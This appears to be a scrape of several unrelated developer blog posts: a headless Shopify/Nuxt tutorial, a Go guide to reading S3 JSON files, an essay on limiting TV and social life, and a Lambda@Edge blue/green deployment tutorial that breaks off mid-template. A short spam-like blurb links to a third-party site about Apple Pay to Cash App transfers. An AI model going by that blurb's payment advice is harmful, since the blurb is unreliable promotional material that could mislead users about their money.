Next you will need to create a Shopify account. They do offer a free test for __ days to build and test your Shopify account. Go to Shopify's Sign Up page to create your account now if you don't have one.
After you have completed signing up or logging in to your existing account, we will now need to get access to the Storefront Access Token. A lot of examples on the internet made this seem difficult, but it's actually quite easy. You just need to create a new developer app by clicking apps on the left menu, then clicking a hard to see link called manage private apps. Here is a screenshot of where it is:

Fill out the form, for the Storefront API Permissions you will want to check off all of these.

Once this is completed, you can scroll down and see a field called Storefront Access Token. It's import to use this token, not the Shopify API token. Now go ahead and go to your Nuxt project that you created. Create a .env file in the base of your project. I went ahead and added variables for my store's Shopify url and the storefront token. Your .env file will look like this:
```
SHOPIFY_DOMAIN="letsgoheadless.myshopify.com"
SHOPIFY_ACCESS_TOKEN="1234"
```
Now we will want to update the nuxt.config file to finalize the connection to your Shopify account. In the modules section of your nuxt.config, you will want to add nuxt-shopify:
```
modules: ['nuxt-shopify'],
```
Then you will want to add a section called shopify. You will add the process.env for your domain and storefront token here. Also add true to unoptimized.
```
shopify: {
domain: process.env.SHOPIFY_DOMAIN,
storefrontAccessToken: process.env.SHOPIFY_ACCESS_TOKEN,
unoptimized: true
},
```
You will now have access to items in your Shopify Account. If you created a new Shopify account during this demo, you will then need to add a couple products to your account so we have something to look at. If you want to see an example of me adding products, you can refer back to the video link above, at minute 13:58. If you already have an account, we can move forward from here.
## Displaying Data from Shopify
Now that we have correctly connected to Shopify using our Storefront Access Token and we have added a few products to our Shopify accounts, let's at least prove that we can display json results from an API call. Let's go to our index.vue page, which is our home page. I'm going to add a fetch request using the nuxt-shopify sdk in the `<script>` portion at the bottom of our index.vue page. I am adding this:
```
export default {
async asyncData({ $shopify, params }) {
const products = await $shopify.product.fetchAll();
return { products };
}
}
```
I got this fetchAll request from the [nuxt-shopify sdk page](https://nuxt-shopify-docs.vercel.app/). You can see there are a lot of examples of the various requests you can make here. Now, I want to create a `<ul>` list and display the json data here. In this list, I need to be sure to do a v-for and a key to make the api call. Since I returned the fetchAll as products, I will do a v-for for that. Here is what I am adding:
```
<ul class="mt-4 text-center">Shopify JSON response
<li v-for="product in products" :key="product.id">
{{product}}
</li>
</ul>
```
In the v-for, I renamed the products to product and I am using the id value as a key to bind them. So theoretically if I simply put product inside of double curly brackets, it will display the entire json result of all of the products I am fetching from Shopify. If you run `npm run dev` in your console now, you should see the json response. This is an example of what a portion of mine looks like:
```
{ "id": "Z2lkOi8vc2hvcGlmeS9Qcm9kdWN0LzY3ODcxMjE1NzgxNTA=", "availableForSale": true, "createdAt": "2021-05-21T18:06:37Z", "updatedAt": "2021-05-21T19:45:51Z", "descriptionHtml": "Blue Hoodie everyone will need to have", "description": "Blue Hoodie everyone will need to have", "handle": "blue-hoodie", "productType": "", "title": "Blue Hoodie", "vendor": "letsgoheadless", "publishedAt": "2021-05-21T18:07:04Z", "onlineStoreUrl": null, "options": [ { "id": "Z2lkOi8vc2hvcGlmeS9Qcm9kdWN0T3B0aW9uLzg3NTc3OTk2MTY2Nzg=", "name": "Title", "values": [ { "value": "Default Title", "type": { "name": "String", "kind": "SCALAR" } } ], "refetchQuery": {}, "type": { "name": "ProductOption", "kind": "OBJECT", "fieldBaseTypes": { "id": "ID", "name": "String", "values": "String" }, "implementsNode": true } } ], "images": [ { "id": "Z2lkOi8vc2hvcGlmeS9Qcm9kdWN0SW1hZ2UvMjkxMjMxMzM2MzY3NzQ=", "src": "https://cdn.shopify.com/s/files/1/0568/1833/5910/products/ix_blue_hoodie.png?v=1621620398", "altText": null,
```
You will notice that you will see the name, description, images, and any other data you have entered. If you entered multiple images for each product, there will be multiple images in the images section. Since there potentially will be multiple images in the future, I would like to now focus on calling the first image which is the primary image for the product. I would also like to see the src url for each image. In order to do that, I am now going to modify the product I had entered, to now view the first image, which is displayed by a 0, followed by src. So here is the updated list:
```
<ul class="mt-4 text-center">Shopify JSON response
<li v-for="product in products" :key="product.id">
{{product.images[0].src}}
</li>
</ul>
```
This should now display the Shopify url for each of these images in a list. That's great, we can now easily call the image urls of the Shopify images! If you remember, I did say I was using Tailwind CSS with my Nuxt project when we initialized it. So if you aren't familiar with Tailwind, the items I put in the class of an element is the style I am adding. So the `mt-4 text-center` I added in the list class, is a margin of 4 and centering the text. I'm not going to explain much more about the Tailwind elements I am using, but certainly welcome you to check out more about Tailwind if you don't feel that you are great at css, because Tailwind makes it so much easier.
## Outlining Our Product Component
Now that we know how to get specific data about each of our products, let's create a simple product component and display them. I am going to create a `ProductWidget.vue` in the components folder in our nuxt project. Then I'm going to create a couple of divs to display the image, title, and description of each product:
```
<div class="rounded-t-lg bg-grey pt-2 pb-2">
<img :src="product.images[0].src"
class="crop mx-auto"
width="380"
height="380"
loading="lazy"
/>
</div>
<div class="pl-4 pr-4 pb-4 pt-4 rounded-lg">
<h4 class="mt-1 font-semibold text-base leading-tight truncate text-gray-700">
{{product.title}}
</h4>
<div class="mt-1 text-sm text-gray-700">{{product.description}}</div>
</div>
```
You can see I used the same product.images[0].src for the img src, but remember to add a `:` to src, so it will bind correctly. For the title and description, they are just simply product.title or description. I am also going to update the script at the bottom of this component in order to identify product in the props and provide a name for the component to call on the index.vue page:
```
export default {
name: 'productWidget',
props: {
product: {
type: Object,
default: null
}
}
```
Now in order to make this component to work on the index.vue page, we are going to need to import the component and register it. I have updated my script like this:
```
<script>
import ProductWidget from '~/components/ProductWidget.vue'
export default {
name: "IndexPage",
components: {
ProductWidget
},
```
I am now going to add a div above my Shopify Json response list that will contain the component. I need to add the v-for and :key again like we did earlier for this div. I am also going to add a v-bind to allow me to use the product inside of the component. Here is what I did:
```
<template>
<div>
<div class="m-6 grid grid-cols-1 2col:grid-cols-2 3col:grid-cols-3 gap-4">
<div v-for="product in products" :key="product.id" v-bind:product="product" class="border rounded-lg bg-gray-100 hover:shadow-lg">
<productWidget :product="product"></productWidget>
</div>
</div>
```
Maybe you noticed the div I added with all of the tailwind css references in the class. That is how I will be using a grid with Tailwind. One unique item I did here was to actually customize my Tailwind setup, choosing at certain breakpoints whether to have 1, 2, or 3 columns. If you are wanting to up your Tailwind game, this is how I adjusted those sizes and created the custom 2col and 3col names. I created a tailwind.config.js file and added this:
```
module.exports = {
theme: {
screens: {
'2col': '850px',
'3col': '1290px',
},
}
}
```
Ok, now if you refresh your localhost again in the browser, you should be seeing several products.
## Optimizing the images
Now that you are looking at your products, you might have noticed the images aren't really optimized, and maybe they might look a little odd next each other because they all have different aspect ratios. I am going to address that by using imgix to optimize these images. Just to confirm, I have been working at imgix since 2015, so I do like using imgix for my projects. You can certainly use another optimization service as well. This isn't a post sponsored by imgix, I just happen to be someone that works at imgix that is writing this post at night on my own time.
Now that we got that out of the way :) I need to essentially cname my shopify image urls to my imgix account. I can do that by creating a web folder source and pointing it to the shopify urls of my images. These are what my images look like:
```
https://cdn.shopify.com/s/files/1/0568/1833/5910/products/ix_blue_hoodie.png?v=1621620398
https://cdn.shopify.com/s/files/1/0568/1833/5910/products/ix_holo_sticker.jpg?v=1621620474
https://cdn.shopify.com/s/files/1/0568/1833/5910/products/ix_gamer_jersey.png?v=1621620521
```
All of the product image urls are the same up to the point after the account id and products. So if I cname up to that portion, I can replace it with my imgix url and start optimizing those images.

Now those urls could be this instead:
```
https://headless-shopify.imgix.net/ix_blue_hoodie.png
https://headless-shopify.imgix.net/ix_holo_sticker.jpg
https://headless-shopify.imgix.net/ix_gamer_jersey.png
```
In order to programmatically change these urls and add responsive design and optimization, I can use that vue-imgix SDK we installed in the beginning. Since this is more of a natively Vue SDK, we will need to create a file in the plugins folder to make it work on Nuxt. I am calling this file vue-imgix.js, this is what I put in it:
```
import Vue from 'vue';
import VueImgix from 'vue-imgix';
Vue.use(VueImgix, {
domain: "headless-shopify.imgix.net",
defaultIxParams: {
auto: 'format,compress'
},
});
```
Choose whatever domain you are using. I am also using auto format,compress as my default, which will just apply some smart formatting and compression. If the compression is too much for your nicer ecomm images, just remove the compress. The format will not hurt your image quality, so definitely always use that at least. Now just register the plugin in the nuxt.config file like this:
```
plugins: ['~/plugins/vue-imgix.js'],
```
Now we can go back to our ProductWidget component and adjust the img tag. Now you can update this to a ix-img tag, which will start using the vue-imgix sdk. I am going to keep the images at a fixed size of 380, but add in multiple sizes for each device resolution. I am also going to add some imgix parameters that will try to fit everything to the same size without cropping, filling in any extra space with a color the same as the background. Also, I am trimming away any extra space around the image, again, without cropping a part of the product. Here is what my img tag now looks like:
```
<ix-img :src="product.images[0].src"
class="crop mx-auto"
width="380"
height="380"
:imgixParams="{fit:'fill', fill:'solid', fillcolor:'f7fafc', trim:'auto'}"
loading="lazy"
fixed
/>
```
If you try to look at the images now, they will be broken. That is because the src is still calling the shopify image url, but I am also adding my imgix domain in front of the entire shopify image url. I need to remove the characters from that url that I identified in my webfolder source. I also want to remove the v= characters at the end of the url. In order to do that, I am going to create a method called imageSrc. Then I will just use a slice to remove the beginning and ending characters of the shopify url that we are receiving. So if I slice the first 57 characters, and slice the last 13 characters, that will get me just the file name ix_blue_hoodie.png. So however many characters you need to slice, you should do on your end as well. Here is my method I built in the ProductWidget component:
```
methods: {
imageSrc() {
return this.product.images[0].src.slice(57, -13)
}
}
```
Now instead of the product.images[0].src, I can call imageSrc() in the src of the img tag. Here is the final img tag:
```
<ix-img :src="imageSrc()"
class="crop mx-auto"
width="380"
height="380"
:imgixParams="{fit:'fill', fill:'solid', fillcolor:'f7fafc', trim:'auto'}"
loading="lazy"
fixed
/>
```
Now we will see the images will work, they look similar, are all automatically trimmed, good quality, and performant!
## Let's Deploy
We are on the home stretch. So I am going to choose to deploy on Vercel. I like how easy it is to deploy SSR with Vercel. In order to do that, I created a vercel.json file and added this:
```
{
"builds": [
{
"src": "nuxt.config.js",
"use": "@nuxtjs/vercel-builder",
"config": {}
}
]
}
```
Now, you can just commit this all to your Github account. Then log in to Vercel, import a new project from that Github account. While you are in the process of deploying the site on Vercel, the last item you need to do is to add the items you put in your .env file into the variables section.

These would be the Storefront API tokens and shopify domain. You can just copy the values from there and enter them in Vercel. Just don't enter the values with a "" around them, that is not needed in Vercel. Press deploy and soon you should be seeing Vercel's fireworks, your site is up and running using headless Shopify!
Don't hesitate to comment or reach out if you have questions. I think the video recording can be very helpful to go along with this explanation. Would love to see anything you are all working on as well.
| daletom |
708,504 | Fetching and reading files from S3 using Go 🔥👀 | Trying to figure out how to do simple tasks using the AWS SDK for particular services can be difficul... | 0 | 2021-05-26T15:26:11 | https://dev.to/seanyboi/fetching-and-reading-files-from-s3-using-go-4180 | aws, go, s3, machinelearning | Trying to figure out how to do simple tasks using the AWS SDK for particular services can be difficult given that sometimes the AWS documentation is limited and gives you the bare minimum. Today I'll show you how to fetch and read particular files from S3 using Go. This tutorial collates many hours of research into what should be a simple problem.
Prerequisites include:
* Go installed / previous experience with Go.
* AWS-SDK set up / previous development with AWS-SDK.
### Basic imports
```go
import (
"encoding/json"
"fmt"
"io/ioutil"
"log"
"github.com/aws/aws-lambda-go/lambda"
"github.com/aws/aws-sdk-go/aws"
"github.com/aws/aws-sdk-go/aws/session"
"github.com/aws/aws-sdk-go/service/s3"
)
```
### Defining global variables and structs.
Start off by defining some basic structs and global variables.
```go
type S3Bucket struct {
Bucket string `json:"bucket"`
Key string `json:"key"`
}
type Metrics struct {
RMSE string `json:"rmse"`
MAE string `json:"mae"`
MAPE string `json:"mape"`
}
var pageNum int = 0
var s3Buckets []S3Bucket
var finalMetrics []Metrics
var sess *session.Session
```
### Initiating a session.
Firstly we initialise a session that the SDK uses to load credentials from the shared credentials file ~/.aws/credentials, and create a new Amazon S3 service client.
```go
sess, err := session.NewSession(&aws.Config{
Region: aws.String(conf.AWS_REGION),
})
if err != nil {
exitErrorf("Unable to create a new session %v", err)
}
```
### Listing items in a bucket with pagination.
The AWS docs only give an example of accessing a bucket's files using [`ListObjectsV2`](https://docs.aws.amazon.com/sdk-for-go/api/service/s3/#S3.ListObjectsV2) function. Now the problem I encountered with this function it does not allow us to apply our own custom function to the results in order for us to filter them even more. Another problem is it returns (up to 1,000) of the objects in a bucket with each request. This includes sub-paths to the files you wish to read.
`ListObjectsV2` lists all objects in our S3 bucket tree, even objects that do not contain files. If I want to target certain objects we have to apply a function. So, instead we'll use [`ListObjectsV2Pages`](https://docs.aws.amazon.com/sdk-for-go/api/service/s3/#S3.ListObjectsV2Pages). `ListObjectsV2Pages` iterates over the pages of a `ListObjectsV2` operation, calling the function with the response data for each page. To stop iterating, we return `false`.
As shown below I wish to target only the `.json` files in the page and append them to an `s3Bucket slice`. This part is important as it will allow us to know the location of each file so we can then access the contents!
We pass our main bucket name as S3_BUCKET and our object path if there is one into S3_PREFIX.
```go
svc := s3.New(sess)
err = svc.ListObjectsV2Pages(&s3.ListObjectsV2Input{Bucket: aws.String(S3_BUCKET), Prefix: aws.String(S3_PREFIX)},
func(page *s3.ListObjectsV2Output, lastPage bool) bool {
pageNum++
for _, item := range page.Contents {
if strings.Contains(*item.Key, "json") {
s3Buckets = append(s3Buckets, S3Bucket{Bucket: conf.S3_BUCKET, Key: *item.Key})
}
}
return pageNum < 100
})
if err != nil {
exitErrorf("Unable to list items in bucket %q, %v", conf.S3_BUCKET, err)
}
```
### Accessing the object contents.
Using the `s3buckets` slice, we will access the `Bucket` and `Key` from the `struct` and request the 'Object' information (or in other words the file) and then fetch the object based on the object information.
```go
for _, item := range s3Buckets {
requestInput := &s3.GetObjectInput{
Bucket: aws.String(item.Bucket),
Key: aws.String(item.Key),
}
result, err := svc.GetObject(requestInput)
if err != nil {
log.Print(err)
}
```
### Reading the contents into slice
The JSON file 'result' is read with the `ioutil.Readall() `function, which returns a byte slice that is decoded into the Metrics struct instance using the `json.Unmarshal()` function.
The best tutorial I have found regarding reading JSON into a `struct` is this one: [Parsing JSON](https://www.sohamkamani.com/golang/parsing-json/)
```go
defer result.Body.Close()
body, err := ioutil.ReadAll(result.Body)
if err != nil {
log.Print(err)
}
bodyString := fmt.Sprintf("%s", body)
var metrics Metrics
err = json.Unmarshal([]byte(bodyString), &metrics)
if err != nil {
fmt.Println("twas an error")
}
finalMetrics = append(finalMetrics, metrics)
}
```
And that's it! You have now fetched JSON files from a certain bucket and parsed the results into a `struct`. In my opinion, especially in machine learning, fetching the contents of an S3 file is hugely important as engineers we are constantly wanting to see and compare for example past models' performance or fetching additional data features to append to our models. | seanyboi |
708,574 | Live like a monk - the key to success | Don't get me wrong, I'm not particularly successful. If I look around I see prettier, richer, more po... | 0 | 2021-05-26T05:28:12 | https://www.sandordargo.com/blog/2021/05/26/living-like-a-monk | watercooler, productivity, lifestyle | Don't get me wrong, I'm not particularly successful. If I look around I see prettier, richer, more popular people. People who rose more in the company ranks, people who write better code, who can contribute more, who make more money either from their main job or on the side, people who write better posts and who simply know much more than me.
And you know what? I'm fine with that.
It doesn't matter.
What matters to me is that I'm growing and that I'm happy with the progress I made during the last years. Each day if I look back to where I was 6 months ago, I see some gain. I could also see gaps, I could think about how many things I messed up, how many things I could have done better, but that would lock me up in negativity. Instead, I'm happy for my growth.
The key element for this growth, at least that's how I see it is not learning about my craft every day - tough it's definitely important -, it's not writing and working on my posts and books each day, but what helps most is that I read some uplifting, inspirational, motivational content on a daily basis. (Which pushes me towards the former activities.)
A few years ago I started to seriously limit and filter my content consumption. I read to help me reach better mental states. Instead of reading about people killing others or making their and others' lives more miserable, I read about how to grow. I read about how to help others.
One of my key sources is [Benjamin Hardy](https://benjaminhardy.com/articles/)'s articles and books. I've been watching [one of his videos](https://www.youtube.com/channel/UC07WXGmXVbNrv3VMOp5DvDw) recently where shared a quote from [Marshall Goldsmith](https://twitter.com/coachgoldsmith):
> *"If you do not create and control your environment, your environment creates and controls you."*
It really clicked with me. This is something I've been pondering about since a while. In fact, since I went back to my hometown for three weeks.

I love my hometown, Budapest, and I love my friends there, I love my family. But I also noticed a couple of things:
- Even tough I managed to carve out some time for myself, it felt unproductive
- I saw how people limit themselves through unsolicited conflicts
- I saw how people are controlled by their environments. Including me.
## TV kills both family time and productivity
According to different studies, an average US adult spends more than 4 hours a day in front of the TV, I have no data on European countries - I didn't really check -, but I have no strong reasons to believe that it's drastically different.
Though it seems that the younger you are, the less you spend watching the telly, it's not for a good reason. Scrolling social media or watching netflix on your mobile is not better than watching the TV.
We have one in our living room, but we barely use it. We turn it on at New Years Eve a bit before midnight (since our kids were born and they are still small we spend the night at home), during some weekends to make a movie afternoon for the kids and each time our president declares war on COVID and asks for the support of his "compatriots". But even that has become boring. Sorry, Monsieur Macron, this is not your fault. It's just boring.
At my father's place, it's different. The TV is on in the morning, in the afternoon and in the evening as well. He often falls asleep while the TV is still turned on.
In the mornings, it didn't bother me. As most people in the house were sleeping anyways, I hid in a small room and kept working on my articles and presentations.
In the evening it was different. I joined my father and brother in the living room where they were either watching some football or the nth replay of some stand-up comedy.
I don't like to talk for the sake of talking. You should ask my wife about that... But I like to be close to my loved ones. Even if it means just being in the same room and reading, working on stuff.
I realized that having the TV on, even if I did't pay attention was very distracting.
I was the guest, and obviously I wouldn't ask them to turn it off when they were actually watching it so that I can read or work, but I was wondering how much useful time is flushed down the toilet like that. Just by watching something not even interesting [while others are working towards their dreams](https://www.youtube.com/watch?v=1g2ntIN7JuY).
When I was left alone with my brother, we often turned it off to talk. But when we were talking with the TV on in the background, I saw that it was difficult to pay full attention. That freaking box is killing both dreams and social times. We should throw our TVs out... Or at least it should not be the center of our living rooms and our lives...
But there is something worse that that.
When you have a TV in the kitchen or in the dining room, or when they share one space with the living room and you turn on the news while eating. It's the worst. I was living like that since I was 14 until I left home.
I tell you what it does. Instead of discussing what matters in the life of a family, such as what happened during the day, what do you plan for next day, what you learnt, what you experienced, what was going on at school, at work, you watch the news.
News are depressing. There are natural disasters. Accidents. People die. Sometimes you don't even understand how can be anyone still alive. But that's not the worse. There are terrorist attacks that obviously creates even more hate. It's still not the worse. There are rich people enjoying their money. And boy, people are envious. There are politicians who get richer in mysterious ways. These are the worst because you can complain about "those thieves". You can blame them because of your lack of success. You can blame the rich, the politicians because of your miserable life.
Believe me, those who watch the news during their meals, they will blame, they will complain, they will make their life a bit more sad. They will smuggle a bit of extra frustration, a bit of extra misery and a big bunch of victim mindset into the everydays.
That's the biggest problem with television.
So if you want a better life, get rid of the TV, or at least don't watch the news, and please, please, at least not during meals.
## Active social life collects taxes, even the next day
Apart from the TV, an extended social life also made it more difficult to stay productive. I have way more friends in Hungary than in France. It makes sense. I spent 28 years in Hungary, 8 in France. And those years in Hungary were my youth, they were the actively socializing years, plus I was fully involved in a few organizations where I made many friends. I already came to France married and soon we had children.
My social groups are very different in the two countries.
I barely go out in the evenings in France (regardless of the current curfew), but in Hungary there are calls almost every day, I have to turn down so many.
I know it would be different if I were constantly at home. But I see the lives of my friends, I see how they live, how frequently they go out, etc. I'd probably step out at least twice a week and the weekends would be also different then here.
It means, that I'd be do something very different during those evenings and probably it'd be very difficult to wake up so early in the next morning.
When I was thinking about all this, I realized that I almost live like a monk.
I live far away from most of my friends, I seriously limit my media intakes, I spend most morning and evenings in silence, reading or working on my articles, books, etc.
It happened a few times lately that my wife asked if everything was fine because I looked strange. I said, oh yes, I was just writing in my head.
Do I enjoy it? Yes.
Living an active social life is fun, but it requires some sacrifices. You sacrifice a lot of time. Sure, you'll have fun, that's good, but you'll have less time to achieve your goals - unless it's having fun. Often, you don't only sacrifice the time you spend with your friends and acquaintances. And I don't mean the traveling, but you might be more exhausted the next day. Oh, maybe I'm just not 21 anymore when I could directly go to university after partying all night and get some sleep between two classes. Sure, life changed, I changed.
I realized the importance of what successful people write about friendships. You need to pay attention who you spend your time with. You need to say no sometimes and you need to spend less time with people if you feel that your roads have parted in different ways. You don't stay there out of comfort and (self-)pity. You don't stay there when your only common topic is reheat the memories from 15 years ago.
Your personality is not permanent. It's perfectly fine that you want different things than before. But most people around you, including your family, friends, will not want you to change. It's easier to spend time with someone they already knew. They also don't want to be jealous, they don't want to be reminded that they can also change themselves. That there are different ways of living your life. Beware, I don't say better, but different. After all, different is not always better...
I needed lots of time and great distance to start to understand this and I'm still far from a complete understanding.
## A conclusion?
Is there any? Anyone should draw his or her own, but...
The TV is bad if you turn it on (too much) and especially if you mix it with family time! Don't do that if you want a happy and/or successful life!
The question of an extended social life is more difficult. Having friends is great, but it's better to have a few great ones than several shallows. As you grow up, you have a family, you have new goals, you need time and you start valuing the real relationships.
You have to control your environment, you have to actively shape it so that it helps you to achieve your goals. This means both a physical environment (hopefully not) including a TV and both a social one.
It can sound harsh, but you also have to actively manage your circles, who you spend time with. It cannot be based on rote, but it must be the result of conscious decisions.
If you do this, if you limit and filter your media and social intakes, you might feel like you live like a monk. At the same time, you'll also feel your soul cleaner and calmer. You'll have the necessary time and peace to work towards your goals.
What's your take on this?
## Connect deeper
If you liked this article, please
- hit on the like button,
- [subscribe to my newsletter](http://eepurl.com/gvcv1j)
- and let's connect on [Twitter](https://twitter.com/SandorDargo)!
| sandordargo |
708,785 | Wrapper Class vs Helper Class vs Controller Class | Wrapper Class: To wrap the Data types to make a single object which can be assessable easily in other... | 0 | 2021-05-26T03:37:43 | https://dev.to/bhanukarkra/wrapper-class-vs-helper-class-vs-controller-class-abm | programming | **Wrapper Class**: To wrap the Data types to make a single object which can be assessable easily in other classes.
**Controller Class** Controller class contains public methods called Action methods. Each method has a one-to-one link with a possible user action, ranging from the click of a button to another trigger. The controller class methods process input data, execute application logic and determine view.
```
public class WrapNitesh {
//CONTROLLER CLASS
public list<wrapaccount> wrapaccountList { get; set; }
public list<account> selectedAccounts{get;set;}
public WrapNitesh (){
//if(wrapaccountList ==null){
wrapaccountList =new list<wrapaccount>();
for(account a:[select id,name,billingcity,phone from account limit 10]){
wrapaccountlist.add(new wrapaccount(a));
}
// }
}
//### SELECTED ACCOUNT SHOWN BY THIS METHOD
public void ProcessSelected(){
selectedAccounts=new list<account>();
for(wrapaccount wrapobj:wrapaccountlist){
if(wrapobj.isSelected==true){
selectedAccounts.add(wrapobj.accn);
}
}
}
//##THIS IS WRAPPER CLASS
// account and checkbox taken in wrapper class
public class wrapaccount{
public account accn{get;set;}
public boolean isSelected{get;set;}
public wrapaccount(account a){
accn=a;
isselected=false;
}
}
}
```
**Helper Class** helper class is used to assist in providing some functionality, which isn't the main goal of the application or class in which it is used
```
function linesOf($mls) {
return preg_split('/\s*\n\s*/',trim($mls));
}
```
| bhanukarkra |
708,851 | Make A Payment From Apple Pay To Cash App Which Is A Non-Verified Account | Do you want to make a payment from Apple Pay To Cash App account even if you are not using a verified... | 0 | 2021-05-26T06:26:16 | https://dev.to/nancybr65040277/make-a-payment-from-apple-pay-to-cash-app-which-is-a-non-verified-account-b05 | applepaytocashapp | Do you want to make a payment from Apple Pay To Cash App account even if you are not using a verified account? Keep the fact in mind that you have to first verify your account and then you should make sure you have a common bank account associated with your Cash app account.
https://www.experts-support.com/blog/transfer-money-from-apple-pay-to-cash-app
| nancybr65040277 |
708,859 | "CloudFront deployments with Lambda@Edge" | A/B Testing, Blue/Green deployments, Canary releases. Different, but still so much in common. They... | 0 | 2021-05-26T06:45:16 | https://dev.to/aws-builders/cloudfront-deployments-with-lambda-edge-gh5 | aws, devops, lambda | ---
title: "CloudFront deployments with Lambda@Edge"
published: true
tags: aws, devops, lambda
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/9uco0ab7c0l3atowphxu.png
---
A/B Testing, Blue/Green deployments, Canary releases. Different, but still so much in common. They all have different purpose but are using basically using the same technical solution under the hood. We do these kind of tests for several reasons. One is to do a A/B test and determine what version our users like the best. Sure it is possible to do A/B testing on the client side, but personally I find it easier to do server side.
Blue / Green and Canary deployments are done to make sure a new version of the application work as we expect and give us an easy way to roll back to previous version in case of a problem. All of these are important practices in the DevOps culture.
Many services from AWS offer this solution out of the box, one service that doesn't is CloudFront. Luckily CloudFront has the possibility to run Lambda@Edge which we can use to solve this.
All source code for this setup is found on [GitHub][github-link]
## Introducing Lambda@Edge
Lambda can run in four different locations in the request flow.

**Viewer request** - Is run when CloudFront receives a request from a viewer.
**Origin request** - Is run before CloudFront forwards a request to the origin.
**Origin response** - Is run when CloudFront receives a response from the origin.
**Viewer response** - Is run before CloudFront returns the response to the viewer.
There are several limitations when it comes to Lambda@Edge, it is only possible to create functions in Python and Node.js. Viewer request and response functions can only allocate 128mb of memory and only run for 3 seconds. You can't use environment variables, you can't use the _latest_ version alias, only fixed versions are supported. Logs are published to the edge region that you access and not to _us-east-1_ region, even if functions must be deployed to that region. Be sure to read the **[documentation][lambda-at-edge-doc-restrictions-link]** before you start working with Lambda@edge.
## Solution Overview
In this solution we are going to use two different Lambda functions for _viewer request_ and _origin response_ hooks, we will store configuration in Parameter Store, and S3 is our origin.

In the _viewer request_ hook we will check for a special cookie, if the cookie is not set we will fetch a random version. In the _origin response_ we set the _set-cookie_ header to store the version we are using.
By setting different values in Parameter Store we can control the weight of each version and we can also reset and have clients receive new random version.
## Viewer Request
Let's start with the Lambda function that will react to the Viewer Request Event. This Lambda function is responsible for checking for our cookie _X-Version-Name_ if an value is set the function will update the request path based on the cookie value. If there is no value set it will roll the dice and get a random version and update the request path. This function will also match the value in cookie _X-Version-Reset_ towards a value in Parameter Store and if the value is different it will ignore any set value in _X-Version-Name_. If there is no value in _X-Version-Name_ or if the value is ignored the function throws the dice and picks a version at random. The weight, for the different versions, are controlled by a value in Parameter Store. Finally the function pass the cookie to the next step in the call chain.
### The Viewer Request code
Full version is available in [GitHub][github-link].
```python
def lambda_handler(event, context):
request = event['Records'][0]['cf']['request']
headers = request['headers']
cookie_version_blue = 'X-Version-Name=Blue'
cookie_version_green = 'X-Version-Name=Green'
path_blue = '/Blue'
path_green = '/Green'
uri = ''
if request['uri'].endswith('/'):
request['uri'] = request['uri'] + 'index.html'
if 'cookie' not in request['headers']:
request['headers']['cookie'] = []
# Reset weights, ignore already set cookie
reset_weight, reset_cookie = do_weight_reset(headers)
if not reset_weight:
for cookie in headers.get('cookie', []):
if cookie_version_blue in cookie['value']:
uri = path_blue + request['uri']
break
elif cookie_version_green in cookie['value']:
uri = path_green + request['uri']
break
request['headers']['cookie'].append(
{'key': 'Cookie', 'value': reset_cookie})
if not uri:
weight = int(load_parameter('Weight'))
cookie_value = ''
if random.random() < float(weight / 100.0):
uri = path_blue + request['uri']
cookie_value = cookie_version_blue
else:
uri = path_green + request['uri']
cookie_value = cookie_version_green
request['headers']['cookie'].append(
{'key': 'Cookie', 'value': cookie_value})
request['uri'] = uri
return request
```
## Viewer Response
The _Viewer Response_ function basically has one task, and that is to pass _set-cookie_ header to the client. This is needed so the client set the cookies _X-Version-Name_ and _X-Version-Reset_ so the client send them in the next request. This is important so the client doesn't jump between versions. The function has a small but very important job to do.
### The Viewer Response code
Full version is available in [GitHub][github-link].
```python
def lambda_handler(event, context):
response = event['Records'][0]['cf']['response']
request = event['Records'][0]['cf']['request']
# Persist cookie, set the set-cookie header
if 'set-cookie' not in response['headers']:
response['headers']['set-cookie'] = []
request_headers = request['headers']
cookie_version_blue = 'X-Version-Name=Blue'
cookie_version_green = 'X-Version-Name=Green'
cookie_reset = 'X-Version-Reset'
for cookie in request_headers.get('cookie', []):
if cookie_version_blue in cookie['value']:
response['headers']['set-cookie'].append(
{'key': 'set-cookie', 'value': cookie_version_blue})
elif cookie_version_green in cookie['value']:
response['headers']['set-cookie'].append(
{'key': 'set-cookie', 'value': cookie_version_green})
elif cookie_reset in cookie['value']:
response['headers']['set-cookie'].append(
{'key': 'set-cookie', 'value': cookie['value']})
return response
```
## Deploying the functions
The Lambda functions need to be deployed in us-east-1 region, since that is the region Lambda@Edge originates from. We must also use a fixed version and can't use the _latest_ alias. As normal AWS SAM is used to define and deploy Lambda Functions.
### The SAM Template
Full version is available in [GitHub][github-link].
```yaml
ViewerRequestFunction:
Type: AWS::Serverless::Function
Properties:
AutoPublishAlias: "true"
Runtime: python3.7
MemorySize: 128
Timeout: 3
CodeUri: ./viewer-request
Handler: handler.lambda_handler
AssumeRolePolicyDocument:
Version: 2012-10-17
Statement:
- Effect: Allow
Principal:
Service:
- lambda.amazonaws.com
- edgelambda.amazonaws.com
Action:
- sts:AssumeRole
Policies:
- SSMParameterReadPolicy:
ParameterName: !Sub ${SsmConfigPath}/*
- Version: "2012-10-17"
Statement:
Action:
- lambda:GetFunction
Effect: Allow
Resource: "*"
ViewerResponseFunction:
Type: AWS::Serverless::Function
Properties:
AutoPublishAlias: "true"
Runtime: python3.7
MemorySize: 128
Timeout: 3
CodeUri: ./viewer-response
Handler: handler.lambda_handler
AssumeRolePolicyDocument:
Version: 2012-10-17
Statement:
- Effect: Allow
Principal:
Service:
- lambda.amazonaws.com
- edgelambda.amazonaws.com
Action:
- sts:AssumeRole
Policies:
- Version: "2012-10-17"
Statement:
Action:
- lambda:GetFunction
Effect: Allow
Resource: "*"
```
## CloudFront setup
Finally we need to create the CloudFront distribution and set the Lambda functions for the Viewer Request and Response triggers. Normally CloudFront will not use and pass the headers to the cache. Since our setup is depending on two cookies we must make sure CloudFront pass them along. That is done by adding them to _WhitelistedNames_ section. Wildcards are supported so we just add _X-Version-*_ to that section.
### The CloudFormation Template
Full version is available in [GitHub][github-link].
```yaml
CloudFrontDistribution:
Type: AWS::CloudFront::Distribution
Properties:
DistributionConfig:
Comment: !Sub "Distribution for ${ProjectName}"
DefaultCacheBehavior:
AllowedMethods:
- "GET"
- "HEAD"
- "OPTIONS"
Compress: False
DefaultTTL: 0
MaxTTL: 0
MinTTL: 0
ForwardedValues:
QueryString: False
Cookies:
Forward: whitelist
WhitelistedNames:
- "X-Version-*"
LambdaFunctionAssociations:
- !If
- ViewerRequestLambdaArnSet
- EventType: viewer-request
LambdaFunctionARN: !Ref ViewerRequestLambdaArn
- !Ref AWS::NoValue
- !If
